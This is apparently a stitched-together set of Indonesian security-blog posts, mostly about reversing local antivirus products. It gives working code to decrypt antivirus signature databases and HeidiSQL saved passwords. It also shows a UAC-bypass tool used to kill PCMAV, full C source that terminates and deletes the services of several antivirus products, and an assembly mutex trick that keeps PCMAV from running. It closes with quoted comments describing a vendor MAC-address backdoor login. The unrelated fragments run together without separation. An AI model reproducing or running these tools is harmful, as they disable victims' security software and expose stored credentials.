.. skip .. lanjut ke masalah inti, ternyata beberapa spam comment ikut masuk ke bagian dapur saya juga. Perasaan Key Akismet udah verified dengan baik dan benar, eh ternyata masih terbentur beberapa rules firewall router saya :( Tapi, Alhamdulillah hal tersebut bisa teratasi dengan baik setelah baca FAQ dari akismet kemudian di input ke dalam router saya :D

Akismet Checking Problem

Karena saya menggunakan MikroTik, maka rules yang akan saya tulis ini menggunakan rules MikroTik. Silakan disesuaikan dengan kebutuhan Anda sendiri, atau untuk lebih jelasnya silakan kunjungi FAQ Akismet.

 /ip firewall filter
add action=accept chain=input comment="Allow DNS Traffic" disabled=no protocol=udp src-port=53
add action=accept chain=forward disabled=no protocol=tcp src-address=72.233.69.88
add action=accept chain=forward disabled=no dst-address=72.233.69.88 protocol=tcp
add action=accept chain=forward disabled=no protocol=tcp src-address=72.233.69.89
add action=accept chain=forward disabled=no dst-address=66.135.58.61 protocol=tcp
add action=accept chain=forward disabled=no protocol=tcp src-address=66.135.58.61
add action=accept chain=forward disabled=no dst-address=66.135.58.62 protocol=tcp
add action=accept chain=forward disabled=no protocol=tcp src-address=66.135.58.62
add action=accept chain=forward disabled=no dst-address=72.233.69.89 protocol=tcp
add action=accept chain=forward content=.rest.akismet.com disabled=no dst-port=80 protocol=tcp
add action=accept chain=forward content=.rest.akismet.com disabled=no protocol=tcp src-port=80 

Allow Akismet

Semoga, spam-spam dan “orang iseng” yang pentest ke web yang ga berguna ini cepet beralih =))

Dari penggalan email tersebut, terdapat attachment berupa file executable dengan nama pp.exe yang di-encode menggunakan base64. Setelah di-decode dan melalui pemeriksaan melalui situs virustotal, ternyata malware tersebut adalah RunOnce. Nah, bagi rekan-rekan yang sering berselancar hendaknya lebih berhati-hati karena malware bisa saja berada di situs yang tidak kita perkirakan sebelumnya. Sekian posting singkat kali ini, semoga bermanfaat. Terima kasih.

Langkah-langkah

1. Download database signature Artav
   

   $ curl -# -O http://arrival88.fileave.com/Signature.rar
   ######################################################################## 100.0%
   

2. Unrar file databasenya
   

   $ unrar x Signature.rar
   
   UNRAR 3.93 freeware      Copyright (c) 1993-2010 Alexander Roshal
   
   Extracting from Signature.rar
   
   Extracting  ARTAVSig.dll                                              OK
   All OK
   

3. Periksa tipe file serta ukurannya
   

   $ file ARTAVSig.dll && ls -lh ARTAVSig.dll
   ARTAVSig.dll: data
   -rw-r--r-- 1 drubicza users 748K 2011-01-29 22:22 ARTAVSig.dll
   

4. Ternyata filenya adalah data :D Oke, waktunya men-decrypt
   

   $ python
   Python 2.7 (r27:82500, Aug 14 2010, 21:08:29)
   [GCC 4.3.3] on linux2
   Type "help", "copyright", "credits" or "license" for more information.
   >>> import array
   >>> with open('ARTAVSig.dll', 'rb+') as f:
   ...     b = array.array('c')
   ...     b.fromfile(f, 160)
   ...     for i in range(0,160):
   ...             b[i] = chr(ord(b[i]) ^ 190)
   ...     f.seek(0)
   ...     b.tofile(f)
   ...
   >>>
   

5. Sekarang, kita periksa lagi jenis filenya
   

   $ file ARTAVSig.dll
   ARTAVSig.dll: Microsoft Access Database
   

6. Selesai :D

Rahasia dari kode decrypt di atas adalah karena Artav menggunakan database yang sama persis dengan al VirusScan buatan Moh Aly Shodiqin. Namun demikian, saya belum sempat mencari tahu apakah Artav sepenuhnya dikembangkan dari source code al VirusScan. Oke, berikut ini potongan fungsi enkripsi yang bisa dilihat pada modul mDatabase.bas al VirusScan.

Function LockUnlock(Filename As String, Locked As Boolean) As Boolean
'--skipped--
               If data(0) = &HBE Then
                  For i = 0 To 160
                    shpwd(i) = inpwd(i) Xor 255 Xor 19 Xor 3 Xor 81
                  Next i
                  Put #1, 1, shpwd
               End If
'--skipped--
End Function

Setelah proses dekripsi, Anda bisa membuka file signature Artav menggunakan Microsoft® Access atau aplikasi lainnya. Oke, sekian dulu artikel singkat kali ini. Semoga bermanfaat. Terima kasih kepada Tuhan Yang Maha Esa, TKP Crew dan Anda :)

C:\> elevate
Too few arguments
Incorrect input. Please find samples below.
Note, 'elevate stuff' will be executed in the elevated shell as 'cmd.exe stuff'

        elevate /c 
        elevate /c  [arg1] [arg2] .. [argn]
        elevate --pid 1234 /c  [arg1] [arg2] .. [argn]
        elevate /c c:\path\foo.exe [arg1] [arg2] .. [argn]
        elevate --pid 1234 /c c:\path\foo.exe [arg1] [arg2] .. [argn]

C:\>

Berikut ini contoh penggunaannya yang diuji coba pada sistem operasi Windows® 7 Ultimate x64. Kita akan mencoba mematikan proses pcmav valhalla (alpha) sebagai user biasa:

C:\> taskkill /F /IM pcmav.exe /T
ERROR: The process with PID 3044 (child process of PID 2100) could not be terminated.
Reason: Access is denied.

C:\>

Ternyata kita tidak dapat mematikan proses pcmav :D , tapi jangan khawatir, sekarang kita matikan prosesnya menggunakan exploit bypassuac.

C:\> elevate /c taskkill /F /IM pcmav.exe /T
SUCCESS: The process with PID 3044 (child process of PID 2100) has been terminated.

C:\>

Nah, exploitnya berhasil dan proses pcmav sudah dinonaktifkan. Oke, posting singkat ini hanya untuk memberikan gambaran saja. Untuk informasi yang lebih lengkap, kawan-kawan bisa googling :D dan baca keterangan yang ada di sini. Terima kasih kepada Tuhan Yang Maha Esa, TKP Crew dan Anda yang telah membaca artikel singkat ini.

{***
  Password-decryption, used to restore session-passwords from registry

  @param string Text to decrypt
  @return string Decrypted Text
}
function decrypt(str: String) : String;
var
  j, salt, nr : integer;
begin
  result := '';
  if str = '' then exit;
  j := 1;
  salt := StrToIntDef(str[length(str)],0);
  result := '';
  while j < length(str)-1 do begin
    nr := StrToInt('$' + str[j] + str[j+1]) - salt;
    if nr < 0 then
      nr := nr + 255;
    result := result + chr(nr);
    inc(j, 2);
  end;
end;

dari potongan fungsi di atas, bisa terlihat bahwa password terlebih dahulu diubah menjadi dua digit hexadesimal lalu dikurangi dengan salt. Salt itu sendiri merupakan bilangan acak antara 1-9 yang diletakkan dibagian paling akhir dari password. Untuk heidisql versi 5, file konfigurasinya bernama portable_settings.txt sedangkan untuk versi 4 namanya RegKey1.reg (CMIIW). Ok, berikut ini source untuk mendekripsi password session heidisql dalam bahasa Python:

s = "PUT_ENCRYPTED_PASSWORD_HERE"
for i in range(0,len(s)-1,2):
    print chr(int(s[i] + s[i+1], 16) - int(s[-1])),

source di atas tidak melakukan konversi untuk ASCII yang kurang dari 0 (silakan tambahkan sendiri :P). Contoh penggunaannya:

$ python
Python 2.7 (r27:82525, Jul  4 2010, 07:43:08) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> s = "736476767A7275673"
>>> for i in range(0,len(s)-1,2):
...     print chr(int(s[i] + s[i+1], 16) - int(s[-1])),
...
p a s s w o r d
>>>

Demikian artikel singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan Yang Maha Esa dan Anda yang telah membaca artikel ini.

Executable modules
Base       Size       Entry      Name       File version    Path
00400000   001B5000   00401344   Morphost   7.01            H:\--snip--\Morphost ß.exe
73420000   00153000   73421AF8   MSVBVM60   6.00.9802       H:\WINDOWS\system32\MSVBVM60.DLL
77120000   0008B000   77121560   OLEAUT32   5.1.2600.5512   H:\WINDOWS\system32\OLEAUT32.dll
774E0000   0013D000   774FD0B9   ole32      5.1.2600.5512   H:\WINDOWS\system32\ole32.dll
77C10000   00058000   77C1F2A1   msvcrt     7.0.2600.5512   H:\WINDOWS\system32\msvcrt.dll
77DD0000   0009B000   77DD70FB   ADVAPI32   5.1.2600.5512   H:\WINDOWS\system32\ADVAPI32.dll
77E70000   00092000   77E7628F   RPCRT4     5.1.2600.5512   H:\WINDOWS\system32\RPCRT4.dll
77F10000   00049000   77F16587   GDI32      5.1.2600.5512   H:\WINDOWS\system32\GDI32.dll
77FE0000   00011000   77FE2126   Secur32    5.1.2600.5512   H:\WINDOWS\system32\Secur32.dll
7C800000   000F6000   7C80B63E   kernel32   5.1.2600.5512   H:\WINDOWS\system32\kernel32.dll
7C900000   000AF000   7C912C28   ntdll      5.1.2600.5512   H:\WINDOWS\system32\ntdll.dll
7E410000   00091000   7E41B217   USER32     5.1.2600.5512   H:\WINDOWS\system32\USER32.dll

Klik ganda pada baris msvbvm60.dll untuk menuju ke library tersebut. Setelah berada pada modul msvbvm60, tekan Ctrl + N lalu cari fungsi __vbaFileOpen seperti ini:

734F3B5D   .text      Export     __vbaFileOpen

Setelah ketemu, tekan F2 untuk mengaktifkan breakpoint. Tekan F9 untuk mulai menjalankan morphost. Kita akan menemukan breakpoint pertama, lanjutkan dengan menekan lagi F9. Pada breakpoint ke-2 ini akan terlihat bahwa morphost mengakses file kernell.dat pada direktori sistem (Windows\system32):

0012F9CC   00157384  UNICODE "H:\WINDOWS\system32\kernell.dat"

Nah, file tersebut adalah file database morphost yang sudah didekripsi oleh morphost ketika dijalankan. Sebenarnya, key yang digunakan oleh morphost bisa terlihat ketika proses debugging. Namun untuk menghemat waktu, keynya saya berikan saja :D yaitu:

Database Morphost Antivirus

Decryptor

Source code berikut ini bisa digunakan untuk mendekripsi database morphost (bulan Mei 2010).

#include <windows.h>

#ifdef _MSC_VER
#pragma comment(lib,"kernel32")
#pragma comment(lib,"user32")
#pragma comment(linker,"/entry:main /subsystem:windows")
#endif

void
main()
{
  int i;
  char *p;
  HANDLE hfile;
  HGLOBAL hmem;
  DWORD dwsize, dwtemp;
  static const char *szkey = "Database Morphost Antivirus";

  if ((hfile = CreateFile("database.mrp", GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0)) == INVALID_HANDLE_VALUE)
  {
    MessageBox (NULL, "gagal membuka file database morphost", "error", MB_OK | MB_ICONERROR);
    ExitProcess(1);
  }
  dwsize = GetFileSize(hfile, NULL);
  hmem = GlobalAlloc(GPTR, dwsize);
  p = (char *) GlobalLock(hmem);
  ReadFile(hfile, p, dwsize, &dwtemp, NULL);
  CloseHandle(hfile);

  for (i = 0; i < (int) dwsize; i++) { p[i] ^= szkey[(i % 27)]; }

  if ((hfile = CreateFile("database.txt", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)) != INVALID_HANDLE_VALUE)
  {
    WriteFile(hfile, hmem, dwsize, &dwtemp, NULL);
    CloseHandle(hfile);
    MessageBox (NULL, "database morphost berhasil didekripsi", "info", MB_OK | MB_ICONINFORMATION);
  }
  GlobalUnlock(hmem);
  GlobalFree(hmem);
  ExitProcess(0);
}

Dan berikut ini adalah database morphost yang sudah didekripsi (bulan Mei 2010)

Database Mei 2010
Database Morphost Antivirus
by:Morphic Karta
Terima kasih kepada pengguna Morphost Antivirus yang telah mempercayakan Morphost sebagai guard komputer.
Kami masih tetap berusaha untuk memberikan yang terbaik, baik dari sisi kenyamanan penggunaan sampai keamanan komputer anda.
Kami juga mengharapkan agar masyarakat juga mau membantu kami dalam pengembangan database Morphost bulan Juni 2010. Kirim/upload sampel malware pada kami.
Anda bisa berikan link download malware kepada kami atau mengirimkannya secara langsung pada kami. Terima kasih.
10 Juni 2010
14
580
581
582
583
584
1003DC=DeleteRegedit=Maret 2009=Ringan
100630=Playboy-A=November 2009=Ringan
103218=Aidid=Tidak Ada Data=Sedang
10C968=OpenSystem=Tidak Ada Data=Sedang
1181AB=Decoil-Dropper=Tidak Ada Data=Parah
119723=FullHouse=Tidak Ada Data=Sedang
11DC95=Iwing=Tidak Ada Data=Sedang
...

Penutup

Demikianlah artikel singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan Yang Maha Esa, TKP crew, Kris Kaspersky, dan Anda yang telah membaca artikel ini :)

• cari ukuran file smadav.loov
• ubah format ukuran ke DWORD dan ambil lower byte dari ukuran tersebut. misalnya ukuran file databasenya 28119 bytes, maka jika diubah menjadi DWORD (hex) menjadi 0x6DD7. nah, 0xD7 ini yang akan kita gunakan.
• selanjutnya kita baca mulai dari offset 0×20 dari file smadav.loov lalu setiap byte kita XOR dengan offset byte tersebut kemudian di XOR lagi dengan byte pada langkah sebelumnya (dalam hal ini 0xD7).
• ulangi sampai selesai

Proof of Concept

        format PE GUI 4.0
	include 'win32a.inc'

;[code]------------------------------------------------------------------------

	push	.done
	push	dword[fs:0]
	mov	dword[fs:0],esp
	invoke	CreateFile,szloov,GENERIC_READ,0,0,OPEN_EXISTING,0,0
	cmp	eax,INVALID_HANDLE_VALUE
	je	.done
	mov	[hfile],eax
	invoke	GetFileSize,[hfile],0
	mov	[dwsize],eax
	invoke	GlobalAlloc,GPTR,eax
	mov	[hmem],eax
	invoke	ReadFile,[hfile],[hmem],[dwsize],dwtemp,0
	invoke	CloseHandle,[hfile]
	movzx	edx,byte[dwsize]
	mov	eax,20h
	mov	ebx,[hmem]
.blah:	mov	cl,byte[ebx+eax]
	xor	cl,al
	xor	cl,dl
	mov	byte[ebx+eax],cl
	inc	eax
	cmp	eax,dword[dwsize]
	jl	.blah
	invoke	CreateFile,szdump,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0
	cmp	eax,INVALID_HANDLE_VALUE
	je	.clean
	mov	[hfile],eax
	invoke	WriteFile,[hfile],[hmem],[dwsize],dwtemp,0
	invoke	CloseHandle,[hfile]
	invoke	MessageBox,0,szmsg,szcap,MB_OK+MB_ICONINFORMATION
.clean: invoke	GlobalFree,[hmem]
.done:	pop	dword[fs:0]
	add	esp,4
	invoke	ExitProcess,0

;[data]------------------------------------------------------------------------

szloov	db "smadav.loov",0
szdump	db "smadav.dump",0
szcap	db "info",0
szmsg	db "decrypt selesai, silakan cek file smadav.dump",0
hmem	dd 0
hfile	dd 0
dwsize	dd 0
dwtemp	dd 0

;[imports]---------------------------------------------------------------------

data import
library kernel32,'kernel32.dll',\
	user32,'user32.dll'
include 'api/kernel32.inc'
include 'api/user32.inc'
end data

dan berikut ini snippet hasil dekripsi file smadav.loov yang ada pada smadav 8.2 beta

Penutup

Sekian artikel kali ini, semoga bermanfaat. Terima kasih kepada: Tuhan Yang Maha Esa, TKP Crew, Kris Kaspersky, dan Anda yang telah membaca artikel ini :)

/**
 * source code ini hanya untuk tujuan pembelajaran
 * TKP Crew tidak bertanggungjawab atas penggunaan
 * dan/atau penyalahgunaan source code ini.
 * USE AT YOUR OWN RISK. PERIOD
 */

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsvc.h>

#ifdef _MSC_VER
#pragma comment(lib,"kernel32")
#pragma comment(lib,"advapi32")
#pragma comment(lib,"user32")
#pragma comment(lib,"msvcrt")
#pragma comment(linker,"/entry:main /subsystem:windows")
#endif

#define VB_MAIN "ThunderRT6Main"
#define VB_FORM "ThunderRT6FormDC"

struct {
  char *szcls;
  char *szcap;
} targets[] = {
  {VB_MAIN, "Morphost"},                    /* morphost */
  {VB_FORM, "autodetect"},                  /* morphost rtp */
  {VB_FORM, "Sys Tray Interface"},          /* smadav rtp */
  {"TFAdvMenu", "PCMAV Advanced Options"},  /* pcmav*/
  {"TFScanRD", "FScanRD"},                  /* pcmav rtp */
  {VB_FORM, "Configuration Settings"},      /* sven7 */
  {VB_FORM, "Ganti Warna"},                 /* FS-2 */
  {"#32770", "$FS-2$"},                     /* FS-2 rtp */
  {"ansav#2194", "ANSAV - BETA"},           /* ansav */
}, victim;

void
unreg_svc()
{
  int i;
  SC_HANDLE hSvc1, hSvc2;
  SERVICE_STATUS svc_stat;
  const char *szsvc[] = {"PCMAVRTPService", "ANSAVDaemon"};

  for (i =0; i < 2; i++)
  {
    if ((hSvc1 = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)) != NULL)
    {
      if ((hSvc2 = OpenService(hSvc1, szsvc[i], SERVICE_ALL_ACCESS)) != NULL)
      {
        ControlService(hSvc2, SERVICE_CONTROL_STOP, &svc_stat);
        DeleteService(hSvc2);
        CloseServiceHandle(hSvc2);
      }
      CloseServiceHandle(hSvc1);
    }
  }
}

BOOL
CALLBACK enum_proc(HWND hwnd, LPARAM lpar)
{
  int i;
  DWORD dwpid;
  HANDLE hproc;
  static char szcls[50];
  static char szcap[50];

  GetClassName(hwnd, szcls, sizeof(szcls)-1);
  GetWindowText(hwnd, szcap, sizeof(szcap)-1);

  for (i = 0; i < sizeof(targets)/sizeof(victim); i++)
  {
    if (strstr(targets[i].szcls, szcls) && strstr(targets[i].szcap, szcap))
    {
      GetWindowThreadProcessId(hwnd, &dwpid);
      if ((hproc = OpenProcess(PROCESS_TERMINATE, 0, dwpid)) != NULL)
      {
        TerminateProcess(hproc, 0);
        CloseHandle(hproc);
      }
      break;
    }
  }
  return 1;
}

void
main()
{
  __try {
    EnumWindows(enum_proc, 0);
    unreg_svc();
    MessageBox (NULL, "test antivirus lokal", "TKP", MB_OK | MB_ICONINFORMATION);
  }
  __except (EXCEPTION_EXECUTE_HANDLER) {
    ExitProcess(1);
  }
  ExitProcess(0);
}

format PE GUI 4.0
include 'win32a.inc'

invoke CreateMutex,0,0,szmutex
invoke Sleep,-1
invoke ExitProcess,0 ; untuk estetika...

szmutex db 'AAC3007F66FD3D85E3727EC54C2DC746',0

data import
library kernel32,'kernel32.dll',user32,'user32.dll'
import kernel32,CreateMutex,'CreateMutexA',ExitProcess,'ExitProcess',Sleep,'Sleep'
end data

Aplikasi PoC tersebut akan berjalan di-background, dan selama aplikasi tersebut berjalan, maka PCMAV v3 tidak akan dapat berjalan sebagaimana mestinya. Hal tersebut terjadi, karena PCMAV mengira bahwa dirinya telah dieksekusi/dijalankan. Sederhana bukan? nah, silakan bereksperimen.

Penutup

Sekian dulu artikel singkat kali ini, semoga bermanfaat, i’ll see you in another tutorial. Terima kasih kepada: Tuhan Yang Maha Esa, TKP Crew, HSN members, Anya, and You ;)

Referensi

[*] Flat assembler (FASM)

[*] Process Explorer

/* password.c
 * backdoor():
 * A mechanism that allows a password to be generated based on the
 * MAC address of the board...
 *
 * Return 1 if the password matches the return of crypt(KEY,SALT).
 * Where:
 *      KEY is an 8-character string created from the MAC address
 *              stored in the ETHERADD environment variable;
 *      SALT is a 2-character string made up of the first and last
 *              character of the ETHERADD env var;
 */

…

/* maccrypt.c:
 * This tool uses the UNIX password encryption function (crypt()) to
 * encrypt a MAC address.  Encryption of a MAC address is used to
 * provide a back door entry into embedded systems that require
 * login/password to access the system.  The backdoor is provided to
 * support the possibility of a customer losing their password...
 *
 * Each system has some "backdoor" username (for example, 'lucent_su')
 * that violates the acceptable syntax of a normal username.  This
 * eliminates the possibility of a customer attempting to use the same
 * username as our backdoor username.  Each time a login is attempted,
 * the username is first compared to the backdoor username, if it
 * matches, and the password matches the encryption of that system's MAC
 * address, then the login is approved with superuser priveledges.  If
 * the username is NOT the backdoor username, then all normal login
 * restrictions apply.
 */

Nah, silakan rekan-rekan kembangkan sendiri ;)